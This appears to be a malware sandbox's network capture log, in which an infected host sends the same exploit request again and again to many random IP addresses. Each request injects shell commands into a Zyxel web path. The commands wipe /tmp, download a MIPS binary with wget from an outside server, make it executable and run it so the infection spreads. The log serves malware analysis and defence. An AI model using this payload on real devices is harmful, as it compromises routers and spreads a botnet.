                              Mar 31, 2024 08:41:13.635768890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2216192.168.2.1350368165.67.77.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635812044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2217192.168.2.135920684.65.107.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635854959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2218192.168.2.1341294194.95.172.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635910034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2219192.168.2.1335000167.0.238.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635942936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2220192.168.2.134381863.89.119.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635982037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2221192.168.2.1337868111.79.31.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636030912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2222192.168.2.1360206115.102.41.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636054039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2223192.168.2.1354826123.118.25.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636125088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2224192.168.2.1348566153.245.237.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636173010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2225192.168.2.1345972162.248.72.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636204958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2226192.168.2.134631888.2.185.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636251926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2227192.168.2.1343258155.58.188.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636279106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2228192.168.2.1340094176.81.39.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636327982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2229192.168.2.134272682.130.131.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636367083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2230192.168.2.1343208194.76.34.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636415958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2231192.168.2.1346508107.89.69.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636447906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2232192.168.2.1339148222.14.147.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636497021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2233192.168.2.1335152156.190.79.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636526108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2234192.168.2.136094227.219.253.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636570930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2235192.168.2.1352824211.234.10.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636607885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2236192.168.2.1347164145.234.246.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636641979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2237192.168.2.134357682.18.101.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636682034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2238192.168.2.133927214.46.241.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636738062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2239192.168.2.134357485.49.214.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636780024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2240192.168.2.1358474169.132.233.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636811018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2241192.168.2.1333308181.138.204.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636838913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2242192.168.2.135593496.33.81.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636857033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2243192.168.2.1346488118.49.237.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636903048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2244192.168.2.1345950163.164.229.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.636920929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2245192.168.2.1356474221.132.8.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637002945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2246192.168.2.1355568149.73.49.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637049913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2247192.168.2.1350058117.35.204.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637093067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2248192.168.2.1345470138.179.52.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637136936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2249192.168.2.1339114158.35.154.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637170076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2250192.168.2.1354144118.167.20.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637228012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2251192.168.2.133682690.205.235.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637278080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2252192.168.2.134097073.179.2.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637315035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2253192.168.2.135427658.161.103.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637376070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2254192.168.2.1343618124.199.192.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637427092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2255192.168.2.13464942.217.5.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637464046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2256192.168.2.134425642.32.149.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637492895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2257192.168.2.135805069.11.93.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637541056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2258192.168.2.135370257.136.128.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637574911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2259192.168.2.1352390203.53.198.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637615919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2260192.168.2.135539651.144.84.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637672901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2261192.168.2.133889895.92.71.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637722015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2262192.168.2.1345730208.195.85.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637768984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2263192.168.2.1335116143.178.251.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637801886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2264192.168.2.1344798201.41.137.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637833118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2265192.168.2.1342604223.243.109.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637881994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2266192.168.2.1342480200.132.178.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637904882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2267192.168.2.135831064.60.146.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637950897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2268192.168.2.134712697.30.196.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.637998104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2269192.168.2.1359260183.220.176.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638022900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2270192.168.2.1345720216.239.118.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638051033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2271192.168.2.1347476154.162.112.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638103008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2272192.168.2.1352786101.218.244.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638142109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2273192.168.2.1345416178.127.28.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638165951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2274192.168.2.134884283.140.166.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638217926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2275192.168.2.135757495.48.195.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638274908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2276192.168.2.1356946202.190.160.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638308048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2277192.168.2.1360334146.37.91.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638361931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2278192.168.2.13565965.6.74.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638405085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2279192.168.2.1353546195.7.192.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638431072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2280192.168.2.133288280.210.225.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638463974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2281192.168.2.1346190198.162.95.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638501883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2282192.168.2.1356516159.120.151.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638539076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2283192.168.2.1336656199.253.38.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638560057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2284192.168.2.1354458148.82.199.43443
                              TimestampBytes transferredDirectionData
